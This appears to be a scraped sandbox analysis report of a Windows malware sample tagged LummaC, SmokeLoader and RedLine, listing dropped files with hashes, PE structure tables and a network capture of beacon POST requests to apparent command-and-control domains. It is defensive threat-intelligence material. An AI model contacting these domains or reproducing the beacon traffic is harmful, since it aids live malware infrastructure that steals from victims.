Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3yPvcmrbqS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: SmokeLoader

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\VBPlayerLIB\VBPlayerLIB.exe

C:\Program Files (x86)\VBPlayerLIB\bin\x86\7z.exe (copy)

C:\Program Files (x86)\VBPlayerLIB\bin\x86\COPYING.LGPLv2.1 (copy)

Windows Analysis Report
3yPvcmrbqS.exe

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2224
Entropy (8bit):	5.354902188542171
Encrypted:	false
SSDEEP:	48:CWSU4y4RQmFoUeWmfgZ9tK8NPdMs7u1iMuge//ZLnOUyu0lhV:CLHyIFKL3IZ2KlDOug4T01
MD5:	7E45375764A5B85520DB515AAC716E46
SHA1:	3B9A54FAD799F95A132E70FDD3076D8A6139B503
SHA-256:	A6723A6E7F8AAC4EFEA376F5CF42B7A434BAADFB9F7B151706B00B7A8865B30A
SHA-512:	06E2BB19E274DF2F548CCC61B20791D862E9E27A434CCE7A7A8EC7910294C99EE3695C98A6DD63853B239332BFFB1D0CCB69500E38C4C69F53C9B38CBC87F7D3
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\7017.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87864
Entropy (8bit):	6.50974924823557
Encrypted:	false
SSDEEP:	1536:JiOTTyNdd/mqN5fomseOpLJ5UP4nVnWecbtGgcNZVKL:JD4Vzgh5UXecbt2ju
MD5:	89A24C66E7A522F1E0016B1D0B4316DC
SHA1:	5340DD64CFE26E3D5F68F7ED344C4FD96FBD0D42
SHA-256:	3096CAFB6A21B6D28CF4FE2DD85814F599412C0FE1EF090DD08D1C03AFFE9AB6
SHA-512:	E88E0459744A950829CD508A93E2EF0061293AB32FACD9D8951686CBE271B34460EFD159FD8EC4AA96FF8A629741006458B166E5CFF21F35D049AD059BC56A1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).uym~.m~.m~....o~.d..f~.m~.F~.V .+n~.V .+g~.V .+f~.V .+s~.V .+l~.V .l~.V .+l~.Richm~.........PE..d....Z.........." .........T......@........................................p......m.....`A........................................0...4...d........P.......0..........8?...`..p...p...8............................................................................text...'........................... ..`.rdata..f5.......6..................@..@.data........ ......................@....pdata.......0......................@..@_RDATA.......@......................@..@.rsrc........P......................@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\B6AA.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704000
Entropy (8bit):	6.498036046725285
Encrypted:	false
SSDEEP:	12288:kRObekMSkfohrPUs37uzHnA6zg5cI5MpAHERDjrNyTeR0oUGOHtraxDExyc:WObekrkfohrP337uzHnA6cH+iHEOWUGq
MD5:	DC768C91E97B42F218028EFA028C41CC
SHA1:	63E5B917E7EB1FE94707CDE664875B71B247EEB5
SHA-256:	A0991507C9DA2C3E21DDA334920FC6C36A7FA1595D4C865C6C200C05128F2EFE
SHA-512:	956D9B9B092B030D99ED6FF9673A0C132FF0565BD80C7AC63BFAC1E3D80062BC641585776BA0D86E2F39DF0D2CDD6DED403979E9CAA65BBB42EC01A0D4106459
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d...........p............@..............................................@...............................%..................................................................................................................CODE....(c.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

Entrypoint:	0x407dfb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6330A004 [Sun Sep 25 18:37:56 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2c31137efffdb21e4a7ea36bf1988dce

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24ee4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1fa1000	0xeaa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4340	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1e4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x249e0	0x24a00	False	0.5069325938566553	data	6.424333400875381	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x26000	0x1f798d8	0x17000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.juv	0x1fa0000	0x1	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1fa1000	0xeaa0	0xec00	False	0.3212559586864407	data	3.760269067620222	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	ZLIB Complexity
RT_CURSOR	0x1fae1c0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	0.7598684210526315
RT_CURSOR	0x1fae308	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.3407039711191336
RT_ICON	0x1fa1600	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.3731949458483754
RT_ICON	0x1fa1ea8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4130184331797235
RT_ICON	0x1fa2570	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.3735549132947977
RT_ICON	0x1fa2ad8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.2732176360225141
RT_ICON	0x1fa3b80	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.27704918032786885
RT_ICON	0x1fa4508	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.3129432624113475
RT_ICON	0x1fa49d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4145228215767635
RT_ICON	0x1fa6f78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.4491803278688525
RT_ICON	0x1fa7928	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.30890191897654584
RT_ICON	0x1fa87d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.3844765342960289
RT_ICON	0x1fa9078	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	0.39055299539170507
RT_ICON	0x1fa9740	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.40173410404624277
RT_ICON	0x1fa9ca8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.13713692946058093
RT_ICON	0x1fac250	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.16651031894934334
RT_ICON	0x1fad2f8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.19385245901639345
RT_ICON	0x1fadc80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.24379432624113476
RT_STRING	0x1faee48	0x28c	data	0.5030674846625767
RT_STRING	0x1faf0d8	0x41e	data	0.45445920303605314
RT_STRING	0x1faf4f8	0x5a8	data	0.43370165745856354
RT_ACCELERATOR	0x1fae160	0x60	data	0.75
RT_GROUP_CURSOR	0x1fae2f0	0x14	data	1.15
RT_GROUP_CURSOR	0x1faebb0	0x14	data	1.25
RT_GROUP_ICON	0x1fa7900	0x22	data	1.0588235294117647
RT_GROUP_ICON	0x1fae0e8	0x76	data	0.6694915254237288
RT_GROUP_ICON	0x1fa4970	0x5a	data	0.7222222222222222
RT_VERSION	0x1faebc8	0x27c	data	0.5220125786163522

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 03:12:18.101485014 CET	275	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lkxwbmwlovgjxl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: sumagulituyo.org
Dec 20, 2023 03:12:18.101505995 CET	145	OUT	Data Raw: 48 9d 8f b9 3c 15 23 52 5a 04 51 56 0c ac 26 ca 5a 6b ed 62 8c 1b df de c1 19 d7 f1 00 f7 d3 e7 f9 a1 8d b5 75 35 90 b6 a4 5d 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8b cd 48 c1 Data Ascii: H<#RZQV&Zkbu5]j~_=;}f=B!bOH=!6T_aVNM6bK:F,/~hc
Dec 20, 2023 03:12:18.362071991 CET	422	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 20 Dec 2023 02:12:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ec87f81daec90ea2b238ef6589e3cea9\|102.129.152.212\|1703038338\|1703038338\|0\|1\|0; path=/; domain=.sumagulituyo.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2023 03:12:18.817909002 CET	275	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://smbideuffuovv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: snukerukeutit.org
Dec 20, 2023 03:12:18.817970037 CET	237	OUT	Data Raw: 48 9d 8f b9 3c 15 23 52 5a 04 51 56 0c ac 26 ca 5a 6b ed 62 8c 1b df de c1 19 d7 f1 00 f7 d3 e7 f9 a1 8d b5 75 35 90 b6 a4 5d 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9c d6 36 d2 Data Ascii: H<#RZQV&Zkbu5]j~_=;}f=B!bO639g &FvZq5;@1$: Y(4B\|ge'$)ous:~k*:A'dA\t7W,>hT
Dec 20, 2023 03:12:19.084006071 CET	423	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 20 Dec 2023 02:12:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=aabd4dc2d2567ed8f24d320bf4191741\|102.129.152.212\|1703038338\|1703038338\|0\|1\|0; path=/; domain=.snukerukeutit.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=102.129.152.212; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0